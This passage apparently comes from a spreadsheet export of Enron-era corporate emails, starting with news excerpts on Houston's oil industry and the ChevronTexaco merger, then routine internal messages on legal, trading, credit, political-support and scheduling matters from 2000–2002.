The dlrs 15.6 billion deal announced Sunday that would create the nation's third largest oil producer may mean more prestige for Houston, even though the nation's two largest oil companies - Irving-based ExxonMobil and San Francisco-based ChevronTexaco - have their headquarters located elsewhere, each has thousands of employees working in the nation's fourth-largest city. _x000D_
It all began with the 1901 Spindletop strike in southeast Texas when oilmen discovered that much of the continental United States' vast oil resources lay beneath Texas soil. _x000D_
"Historically oil and gas centers sprang up adjacent to oil and gas discoveries," said David Bole, the vice president of Randall &amp; Dewey, Inc., a Houston-based oil consulting firm. "But certainly with high-speed communications developed over the last 30 years, the decision making has been centralized more in the financial centers. _x000D_
"What has set Houston apart from many other emerging oil centers was the caliber of the early wildcatters, their vision and their ability to build mega-companies. In many cases it is their legacy that has built Houston into today's oil capital." _x000D_
Shell Oil Co. is based in Houston alongside several other producers and numerous offshore drilling, oil field services, pipeline, oil field firefighting and related companies. _x000D_
In recent years, the city also has become home to large energy trading firms such as Dynegy, Inc., Enron Corp., Reliant Inc. and others. Together, they operate dozens of computerized energy trading floors scattered throughout the city. _x000D_
"Consolidation is cumulative - a self-fulfilling process of centralizing all the important pieces of the oil industry in one place," Bill Gilmer, an economist in Houston for the Federal Reserve Bank of Dallas, wrote in a recent publication. "The same principles, of course, are what draw moviemakers to Hollywood, financial service providers to New York and automakers to Detroit." _x000D_
And, it seems, energy companies to Houston._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
COMPANIES &amp; FINANCE THE AMERICAS - Energy deal savings set to increase._x000D_
By ANDREW HILL._x000D_
_x000D_
11/20/2001_x000D_
Financial Times_x000D_
(c) 2001 Financial Times Limited . All Rights Reserved_x000D_
ChevronTexaco yesterday increased the annual savings it expected to achieve from the merger between the two oil groups to $1.8bn by March 2003. _x000D_
David O'Reilly, chief executive, told analysts that the combined company would also meet its original synergy target of $1.2bn within six to nine months of the deal, which was completed last month._x000D_
Mr O'Reilly also said it expected oil and gas production to grow at an annual rate of 2.5 to 3 per cent over the next five years, and dismissed worries about the falling oil price. _x000D_
"Our business is used to swings and volatility - if you want a stable price environment you don't want to be in this business," he told reporters after addressing analysts in New York. _x000D_
Mr O'Reilly said the news of the latest big merger in the industry - the $35bn deal between Conoco and Phillips Petroleum - only made him more confident that the ChevronTexaco deal was right. _x000D_
ChevronTexaco now claims to be the third-largest energy company in terms of global oil reserves and the fourth-largest in global oil and natural gas production. He said the synergies translated into gains of about $1 per share after tax. _x000D_
ChevronTexaco has an important role in Dynegy's rescue bid for Enron, the rival energy group. ChevronTexaco has a 26 per cent stake in Dynegy and immediately invested $1.5bn in convertible preferred shares of Dynegy to fund its direct equity infusion in Enron. ChevronTexaco is committed to buying a further $1bn of Dynegy common stock once Dynegy completes its takeover. If the deal fails, ChevronTexaco can redeem the convertible preferred shares for $1.5bn in cash or convert to common shares, giving it a 36 per cent stake in equity. _x000D_
Mr O'Reilly said yesterday the group was committed to the deal, despite worries about potential hidden liabilities at Enron. _x000D_
ChevronTexaco is doing its own review of potential litigation risks at Enron, and Mr O'Reilly said there was "a full suite of due diligence" that needed to be </t>
  </si>
  <si>
    <t>Thu, 20 Jul 2000 05:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kingwoodcove@ttimeonline.com'})</t>
  </si>
  <si>
    <t>Kingwood Cove - $10 Before 10am!</t>
  </si>
  <si>
    <t>Only $10 for a 1/2 Cart &amp; Green Fee!_x000D_
Wednesday &amp; Friday Mornings Before 10am._x000D_
_x000D_
Print out and present this Email Offer the day of play._x000D_
Not Valid With Any Other Offers._x000D_
_x000D_
Thanks for being a part of our E-Mail Offers Club!_x000D_
_x000D_
******This offer expires August 31, 2000********_x000D_
_x000D_
Playing Partner's Email Addresses: (optional)_x000D_
_x000D_
Player 1: _________________@____________________x000D_
_x000D_
Player 2: _________________@____________________x000D_
_x000D_
Player 3: _________________@____________________x000D_
_x000D_
Player 4: _________________@____________________x000D_
_x000D_
_x000D_
VISIT: http://www.ttimeonline.com/index.html_x000D_
to view a complete listing of our online_x000D_
*****PASSLINK GOLF PROMOTIONS!****_x000D_
_x000D_
---_x000D_
You are currently subscribed to 90027-members as: dfarmer@enron.com_x000D_
To unsubscribe send a blank email to _x000D_
leave-90027-members-12518J@lists.clubcorp.com</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 07:46:10 -0800 (PST)</t>
  </si>
  <si>
    <t>SD Mgmt update2 Dec-01.ppt</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Kevin,_x000D_
attached is the Sun Devil powerpoint presentation we gave to Stan back in December.  I added one slide since called Project Rationale.  The document probably has more detail than you need but more is better right?  Let me know if you need help cutting it down.</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 07:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Porter &amp; Hedges</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know anyone over there well enough to recommend them, so my interest _x000D_
is low. However, I have no objection._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robert C Williams@ENRON_DEVELOPMENT_x000D_
04/27/2000 12:03 PM_x000D_
To: Stephanie Harris@ENRON_DEVELOPMENT, Rob _x000D_
Walls/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Richard Sanders_x000D_
cc:  _x000D_
Subject: Porter &amp; Hedges_x000D_
_x000D_
Are we interested in adding Porter &amp; Hedges to our list of approved _x000D_
litigation counsel?  Mark Glatzer of that firm has called me and requested a _x000D_
meeting or lunch.  I don't want to encourage him if there's no hope._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 00:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Software That is Not Part of the Coreload</t>
  </si>
  <si>
    <t>I have been inundated with e-mail regarding loading software for printers, _x000D_
palm pilots, and minor applications necessary for normal course of business.  _x000D_
You may load these types of applications, however, you must realize the _x000D_
following:_x000D_
_x000D_
The user must maintain copies of any required licenses and realize we do not _x000D_
provide help desk services on_x000D_
non standard software.  It is also important to note that if in the process _x000D_
of installing non standard software, _x000D_
the users standard core software becomes corrupt, the service level _x000D_
agreements from the help desk are null_x000D_
and void and we can only commit to best effort for resolution._x000D_
_x000D_
If you are in doubt about the software you want to install, send me an e-mail _x000D_
with the specifics and I'll get back to you.  Please bear in mind that you _x000D_
may not get a _x000D_
resolution until next week as we are right in the middle of IT integration._x000D_
_x000D_
Thanks._x000D_
_x000D_
--D</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 03:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting With Ken Curry</t>
  </si>
  <si>
    <t>Suzanne:_x000D_
Please set up a 1 hour meeting with Ken Curry after today to discuss Inland _x000D_
credit issues.  Jack Falconi wants me to send him an issues list before we _x000D_
set up a meeting with him. _x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 15:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/26/01; HourAhead hour: 23;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/26/01; HourAhead hour: 23;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042623.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/26/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: CISO_EPMI_DESERT_x000D_
  ENGY_TYPE: NFRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 07:04:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NOrm Coleman</t>
  </si>
  <si>
    <t>_x000D_
What do you think?_x000D_
 -----Original Message-----_x000D_
From: 	Landwehr, Susan M.  _x000D_
Sent:	Tuesday, September 18, 2001 9:00 AM_x000D_
To:	Kean, Steven J._x000D_
Cc:	Robertson, Linda; Shapiro, Richard_x000D_
Subject:	RE: NOrm Coleman_x000D_
_x000D_
It is unlikely that he will have any credible opposition in a primary.  Late last spring, there was a very well liked Republican state house member (assistant majority leader Tim Pawlenty) who was set to announce his candidacy, and the day before his announcement, Vice President Cheney called him and asked him not to run. This created a great furor in the press and the party for a short time.  Pawlenty agreed not to run, citing his desire that the party remain united so that we have a better chance of beating Wellstone. Although folks in the party were a tad miffed that Cheney was trying to be kingmaker, they ultimately want to win more than they want to put up other candidates._x000D_
_x000D_
Tim Pawlenty has now announced that he will run for Governor. Jessie Ventura, true to form, has said that he won't make up his mind until next summer!  If Ventura runs again, he has a very good chance of being re elected (he still has approval ratings in the 65-70% range)._x000D_
_x000D_
As I mentioned earlier,  I don't believe that Wellstone will ever look at our issues in a rational or market oriented manner.  I tend to think that his votes will be just the same regardless of whether we back another candidate or not._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kean, Steven J.  _x000D_
Sent:	Tuesday, September 18, 2001 8:30 AM_x000D_
To:	Landwehr, Susan M._x000D_
Cc:	Robertson, Linda; Shapiro, Richard_x000D_
Subject:	RE: NOrm Coleman_x000D_
_x000D_
I talked to Ken yesterday.  I had also talked to Linda Robertson.  Linda was a little concerned about taking on an incumbent (now majority) Senator.  I told Ken we should wait a bit and he agreed._x000D_
_x000D_
Who else is going to run from the Republican side?  I think that we ultimately ought to support a Republican in this race, incumbency or no.  But I want to make sure we back the right one._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Landwehr, Susan M.  _x000D_
Sent:	Thursday, September 13, 2001 6:42 PM_x000D_
To:	Kean, Steven J._x000D_
Cc:	McVicker, Maureen_x000D_
Subject:	NOrm Coleman_x000D_
_x000D_
_x000D_
Steve--how was your call earlier this week with Norm Coleman (Republican running for US Senate from Minnesota).  Are we going to back him and is there anything I can do to assist?</t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ISO 9000</t>
  </si>
  <si>
    <t xml:space="preserve">Do you know what this is?   ISO makes me think power.  Any clues?  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 03/31/2000 11:12 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Terrie Wheeler@ENRON_x000D_
03/30/2000 12:00 PM_x000D_
To: Ted Murphy/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT_x000D_
cc: Andrew Cornfield/LON/ECT@ECT, Donna Lowry/HOU/ECT@ECT _x000D_
Subject: ISO 9000_x000D_
_x000D_
Ted or Sally -_x000D_
_x000D_
Is this something you can answer for Andrew?  Donna I've cc you on this _x000D_
message since this might be compliance related too._x000D_
_x000D_
Terrie_x000D_
_x000D_
---------------------- Forwarded by Terrie Wheeler/GPGFIN/Enron on 03/30/2000 _x000D_
11:55 AM ---------------------------_x000D_
From: Andrew Cornfield@ECT on 03/29/2000 11:12 AM_x000D_
To: Terrie Wheeler/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: ISO 9000_x000D_
_x000D_
Terrie_x000D_
_x000D_
I've been asked by one of traders whether we are ISO 9000 certified._x000D_
_x000D_
From what I can ascertain we have not been certified in Europe. Are you able _x000D_
you provide any further on this for Europe and Enron Corp?_x000D_
_x000D_
Thanks_x000D_
Andy_x000D_
Ext 37272_x000D_
_x000D_
I'm in Helsinki  this week so time difference is 9 hours._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 10:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Legal Dept. Intraweb Site</t>
  </si>
  <si>
    <t>Mark -_x000D_
_x000D_
Attached is an outline of what the site is intended to look like (as designed _x000D_
in PowerPoint).  The name - LegalOnline - has pretty much been determined, _x000D_
but the logo and tag line are still up in the air.  I put the attached _x000D_
together to give the IT design group an idea of the look and feel we are _x000D_
trying to hit._x000D_
_x000D_
I welcome any suggestions or comments and would be more than happy to walk _x000D_
you through the way it is envisioned the site will work._x000D_
_x000D_
_x000D_
_x000D_
Mark_x000D_
Senior Counsel, ENA_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3940_x000D_
E-Mail:      Mark.Greenberg@enron.com</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:19:58 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'tk.lohman@enron.com', 'lindy.donoho@enron.com', 'kay.miller@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Transwestern Response To CPUC Protest/ Docket No. RP97-288-017</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised version of TW's response to the CPUC's protest. This version reflects comments received from Teb, Mary Kay, Greg and Maria. I apologize that the attachment is not red-lined. I'm having computer problems and have not been able to generate a red-lined version that accurately tracks the changes. _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>Summary of Protests to TW's 637 filing</t>
  </si>
  <si>
    <t xml:space="preserve">For your information.  If you have any questions, let me know..._x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 09/21/2000 _x000D_
05:03 PM ---------------------------_x000D_
_x000D_
_x000D_
Janet Butler_x000D_
09/21/2000 04:50 PM_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc: Shelley Corman/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject: Summary of Protestors to TW's filing_x000D_
_x000D_
Attached is summary of protestor comments to TW's Order 637 compliance _x000D_
filing.  It will be attached to the Weekly Report as well._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 02:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.shults@enron.com', 'teresa.mandola@enron.com', 'chad.clark@enron.com', 'peggy.hedstrom@enron.com', 'christian.yoder@enron.com', 'jeff.harbert@enron.com', 'sheila.glover@enron.com', 'william.bradford@enron.com', 'david.hardy@enron.com', 'cliff.lawrick@enron.com', 'nella.cappelletto@enron.com', 'jeffrey.hodge@enron.com', 'brad.coleman@enron.com', 'geoff.storey@enron.com', 'keith.holst@enron.com', 'bill.kyle@enron.com', 'howard.sangwine@enron.com', 'andrea.hauser@enron.com', 'justin.rostant@enron.com', 'peter.keohane@enron.com', 'homer.lin@enron.com', 'bryan.hull@enron.com', 'laura.scott@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', 'scott.neal@enron.com', 'david.delainey@enron.com', 'jefferson.sorenson@enron.com', 'dianne.seib@enron.com', 'larry.cash@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com', 'kyle.kitagawa@enron.com', 'daniel.diamond@enron.com', 'jonathan.mckay@enron.com', 'cheryl.dawes@enron.com', 'harry.bucalo@enron.com', 'cyntia.pastega@enron.com', 'brent.price@enron.com', 'john.disturnal@enron.com', 'barry.tycholiz@enron.com', 'sara.shackleton@enron.com', 'mark.powell@enron.com', 'greg.johnston@enron.com', 'george.hope@enron.com', 'jan.wilson@enron.com', 'steve.jackson@enron.com', 'debbie.brackett@enron.com', 'chris.lambie@enron.com', 'lisa.gillette@enron.com', 'beth.cowan@enron.com', 'tana.jones@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'paul.devries@enron.com', 'rob.milnthorp@enron.com', 'eric.ledain@enron.com', 'michael.cowan@enron.com', 'bob.bowen@enron.com', 'derek.davies@enron.com'})</t>
  </si>
  <si>
    <t>Canadian Credit Watch List--11/27/00</t>
  </si>
  <si>
    <t xml:space="preserve">          Attached is a Canadian Credit Watch listing.  If there are any _x000D_
personnel in your group that were not included in this distribution, please _x000D_
insure that they receive a copy of this report._x000D_
_x000D_
To add additional people to this distribution, or if this report has been _x000D_
sent to you in error, please contact Veronica Espinoza at x6-6002._x000D_
_x000D_
For other questions, please contact Bill Bradford at x3-3831, Russell Diamond _x000D_
x5-7095 or the Global Credit Hotline at x3-1803._x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 07:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SWAP Terms</t>
  </si>
  <si>
    <t xml:space="preserve">All -_x000D_
I spoke with John Greene about this issue this morning, and he said that he _x000D_
would handle it.  It is not customary to sign term sheets.  I put Peter Barna _x000D_
(Merrill Lynch) in direct contact with John with the understanding that they _x000D_
would work out the details (including the signature).  I asked them to _x000D_
forward the confirmation to us when it was ready.  So, in short, there _x000D_
shouldn't be anything that we need to do on this._x000D_
CF_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Jeff Nogid @ ECT                           06/29/2000 02:48 PM_x000D_
	_x000D_
_x000D_
To: Clint Freeland/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: SWAP Terms_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jeff Nogid/HOU/ECT on 06/29/2000 02:44 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Jeff Nogid                           06/29/2000 02:27 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Laurel Adams/HOU/ECT@ECT _x000D_
Subject: SWAP Terms_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jeff Nogid/HOU/ECT on 06/29/2000 02:23 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Laurel Adams_x000D_
06/29/2000 11:52 AM_x000D_
To: Jeff Nogid/HOU/ECT@ECT, Jo Zepeda/HOU/ECT@ECT, Jill Erwin/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SWAP Terms_x000D_
_x000D_
Who in Corporate Legal would be the correct person to initial this document?  _x000D_
Or, would it be the Corp. trader?  Jeff, you may be able to sign off your _x000D_
agreement with the terms--I'm not sure that they are looking for a legally _x000D_
authorized signatory, but as I have no idea what Corp. intended to trade, I'm _x000D_
thinking you don't want me signing it.  Please advise  ASAP!_x000D_
---------------------- Forwarded by Laurel Adams/HOU/ECT on 06/29/2000 11:49 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Selena Reyes                           06/29/2000 10:52 AM_x000D_
	_x000D_
_x000D_
To: Laurel Adams/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SWAP Terms_x000D_
_x000D_
Laurel,_x000D_
_x000D_
Attached is a term sheet from Merrill Lynch on ENE stock that we traded _x000D_
yesterday in swap on behalf of Corp.   ML is requesting that someone sign the _x000D_
term sheet.  Can you forward this to legal and find out who would be the _x000D_
right person to sign the term sheet.  I think it may be of an urgent matter _x000D_
b/c we are trading with them today._x000D_
Keep me posted._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Selena _x000D_
---------------------- Forwarded by Selena Reyes/HOU/ECT on 06/29/2000 10:48 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Barna, Peter (Equity Capital Markets)" &lt;pbarna@exchange.ml.com&gt; on _x000D_
06/28/2000 05:14:46 PM_x000D_
To: "'john.greene@enron.com'" &lt;john.greene@enron.com&gt;, _x000D_
"'david.vitrella@enron.com'" &lt;david.vitrella@enron.com&gt;, _x000D_
"'selena.reyes@enron.com'" &lt;selena.reyes@enron.com&gt;_x000D_
cc: "Maanavi, Dariush (CICG-GEDNY)" &lt;dmaanavi@exchange.ml.com&gt;, "Lyons, _x000D_
Maureen (CICG-GELPNY)" &lt;malyons@exchange.ml.com&gt; _x000D_
Subject: SWAP Terms_x000D_
_x000D_
_x000D_
 &lt;&lt;ENE_TRR-Swap_6_27_legal.doc&gt;&gt;  &lt;&lt;ENE_6_28_swap.xls&gt;&gt;_x000D_
John,_x000D_
Attached is a termsheet and execution summary for the ENE swap entered into_x000D_
today.  If we dont get to 1mm shares by Friday we are happy to tranche the_x000D_
swap based on the number of shares executed at that time.  Please give me a_x000D_
call if you have any questions or comments.  We will give you a call in the_x000D_
morning to discuss if you would like us to continue our hedging activity._x000D_
Thank you._x000D_
_x000D_
 - ENE_TRR-Swap_6_27_legal.doc_x000D_
 - ENE_6_28_swap.xls_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 10:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: World Hunger Rev 4a- JR</t>
  </si>
  <si>
    <t xml:space="preserve">I think we need an internal review to develop responses to positions as _x000D_
outlined in PT's memo. _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Sheila Tweed@ECT on 05/15/2001 04:22 PM_x000D_
To: John G Rigby/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Scott Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Kay _x000D_
Mann/Corp/Enron@Enron, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: World Hunger Rev 4a- JR  _x000D_
_x000D_
My prior email was written before I read this and it seems like everyone is _x000D_
geared up for the call with GE tomorrow.  I'm OK with proceeding if everyone _x000D_
thinks we can resolve some stuff._x000D_
_x000D_
_x000D_
_x000D_
	John G Rigby@ENRON_DEVELOPMENT_x000D_
	05/15/2001 03:03 PM_x000D_
		 _x000D_
		 To: Kay Mann/Corp/Enron@Enron, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sheila Tweed/HOU/ECT@ECT, Ed B _x000D_
Hearn III/HOU/ECT@ECT, pthompson@akllp.com_x000D_
		 cc: John Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 Subject: World Hunger Rev 4a- JR_x000D_
_x000D_
  I took several assignments from the last World Hunger call.  Status as _x000D_
follows:_x000D_
_x000D_
a.   Tax language-  I have sent a prior version of Rev 4 jr to Matt G asking _x000D_
him to call me to let me know when he can talk with GE tax rep.  Steve Swifit _x000D_
and I are in London and would like to sit in on that call._x000D_
_x000D_
b.   Insurance Language review.   I sent same version to David Marshall and _x000D_
Paul Parrish asking for their reviews and opinion as to whether 7FA's are new _x000D_
technology._x000D_
_x000D_
c.   I "volunteered" to look at the termination language in world hunger, GE _x000D_
had some problems, and I had the same problem with the ARCOs contract.   I _x000D_
drafted a fix last Friday, sent to Kay M for comment.  I have included my _x000D_
suggested changes in the attached redline.  I have forwarded same fix to GE _x000D_
at end Friday for Arcos.    I have asked Kay if she still has a concern with _x000D_
the Limit of Liability as it relates to termination.  I think it works._x000D_
_x000D_
d.  I "volunteered" to work over Article 10, Exhibit B-3 and Exhibit B-6 in _x000D_
relation to Guarantees and liquidated damages.  I have done that in the _x000D_
attached redline of the T&amp;C and Exhibits._x000D_
_x000D_
e. Some time ago I volunteered to resurrect the language associated with the _x000D_
reduction in the LD refund in Section 10.9.8.   I had sent out a couple weeks _x000D_
ago but received no reaction.    I have entered that fix in the attached _x000D_
redline._x000D_
_x000D_
f.  I have made several minor changes to definitions associated with _x000D_
performance._x000D_
_x000D_
Attached is Rev4-JR version of GE T&amp;C's and Exhibits for world hunger.  They _x000D_
start from the clean rev 4 version of the T&amp;Cs that Peter forwarded to me at _x000D_
my request.  The attached are redlined to show my changes._x000D_
_x000D_
I have not sent any of this to GE except for the termination language fix.   _x000D_
I suggest that the Enron team give these a quick read before the World hunger _x000D_
call.  I can print same here and share with GE during the call unless there _x000D_
is an objection.  _x000D_
_x000D_
I hope this will help to advance the process.  My earlier emails to Paul and _x000D_
Matt were not intended confuse the situation with different drafts.  Please _x000D_
ignore those and for the above purposes use the attached files._x000D_
_x000D_
_x000D_
Kay- I suggest that you forward to others who you feel appropriate for the _x000D_
purposes of the world hunger call on Wednesday._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 08:11:59 -0800 (PST)</t>
  </si>
  <si>
    <t>The following item was presented in this week's corporate change control...._x000D_
_x000D_
Jan. 7_x000D_
From 7:00 a.m. through 1/11 at 5:00 p.m., Facilities will perform the annual maintenance on the rooftop chillers.  The chillers will be taken down one at a time during the maintenance.  No impact to ETS is expected._x000D_
_x000D_
ETS Solution Center - Houston	713-345-4745_x000D_
ETS Solution Center - Omaha	402-398-7454</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 07:48:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'r.jeff.williams@accenture.com'})</t>
  </si>
  <si>
    <t>Dude..._x000D_
Lost my damn cell phone in Durango.  (crazy freaking durango...)  Would you_x000D_
send me your and Jo's cell and home #'s._x000D_
Laters...</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 07:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Master Sales Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Do you want to keep up with this, or pretend you never heard of Chicago?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/11/2000 02:27 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Boyd J. Springer" &lt;bjspringer%JONESDAY@JonesDay.com&gt; on 09/11/2000 11:41:27 _x000D_
AM_x000D_
To: gregg.penman@enron.com_x000D_
cc: kay.mann@enron.com _x000D_
_x000D_
Subject: Master Sales Agreement_x000D_
_x000D_
_x000D_
________________________________________________________________x000D_
_x000D_
This message and any attachments are intended for the individual or entity_x000D_
named above.  If you are not the intended recipient, please do not read,_x000D_
copy, use or disclose this communication to others; also please notify the_x000D_
sender by replying to this message, and then delete it from your system._x000D_
Thank you._x000D_
________________________________________________________________x000D_
_x000D_
Jerry Fox at Peoples reports that work on the Master Sales Agreement_x000D_
Petition should progress this week, and that Peoples intends to file the_x000D_
Peitiion (for Peoples and North Shore)  with accompanying testimony that_x000D_
will supply additional information supporting approval of the Agreement. He_x000D_
says this shouldn't take long to complete._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 01:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deep in the heart of Texas....</t>
  </si>
  <si>
    <t>Well, how does it feel to be back?  I'm sure, even though our fair city can't _x000D_
compete with London for history and culture, there are a few things you've _x000D_
missed about this place.  Hope the flight back was good and I'm sure I'll be _x000D_
seeing you around._x000D_
_x000D_
Susan</t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 16:00:04 -0800 (PST)</t>
  </si>
  <si>
    <t>Schedule E Reconciliation</t>
  </si>
  <si>
    <t>After talking to Tom I have a new plan of attack for Schedule E's.  He informed me that the top-levels were typically put in at one region level per roll.  I had Zhiyun re-run the killed deals calc (post id 15667).  Everyone should go back into the rolls and put the top-levels into their correct regions also adjusting the Schedule E's.  This is why the differences are so large in certain areas and the only way we can start to pinpoint the problem is to find the problem spots._x000D_
_x000D_
I have also identified where the $4.6 MM difference for OPPD arose from.  Deal # 11678.04 has not been transferred into the East Bank book.  In addition, there are no volumes in this deals; however, if you look back to the official 11/30/2001 calc there are volumes for this deal.  It gets more bizarre than that because there were two deals that should have been transferred for OPPD (11678.4, and 564826.1).  Deal 564826.1 was transferred but the valuations are approximately $4MM different.  I have printed detail for deals 11678.4 and 564826.1 (they are in Casey's chair) as of the 11/30/2001 official calc.  I have also printed deal 564826.1 in the 11/30/2001 bankruptcy calc.  I noticed that I cannot see any swap detail reports for the bankruptcy calc.  Please re-calc and generate these reports as they will probably be important as we dig into details._x000D_
_x000D_
Other than Andrea who has to perform some IT testing, no one should be working (or playing) on anything other than trying to get these Schedule E's and top-levels figured out.  The task is actually very important as there will be many decisions made off of these numbers._x000D_
_x000D_
Thanks,_x000D_
Stacey</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 12:35:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: US Benzene Fin Options - Please review and reply</t>
  </si>
  <si>
    <t>Tana, Kelly, Karen:_x000D_
_x000D_
The product long description below will fall under the new product type:_x000D_
_x000D_
=09US Benzene Fin Opt_x000D_
Credit (Tom Moran/Wendi Lebrocq) have approved copying the profiles for the=_x000D_
 new product type from the following:_x000D_
_x000D_
=09US Unl Gasoline Fin Opt_x000D_
_x000D_
Please respond no later than 10 AM, Wednesday, October 10._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Moran, Tom =20_x000D_
Sent:=09Monday, October 08, 2001 1:54 PM_x000D_
To:=09Sever, Stephanie_x000D_
Cc:=09Lebrocq, Wendi_x000D_
Subject:=09RE: US Benzene Fin Options - Please review and reply_x000D_
_x000D_
Stephanie,_x000D_
_x000D_
Let's copy the existing profiles for US Unl Gasoline Fin Opt Call and use i=_x000D_
t for this new product._x000D_
Let me know if there are any questions._x000D_
_x000D_
Regards,_x000D_
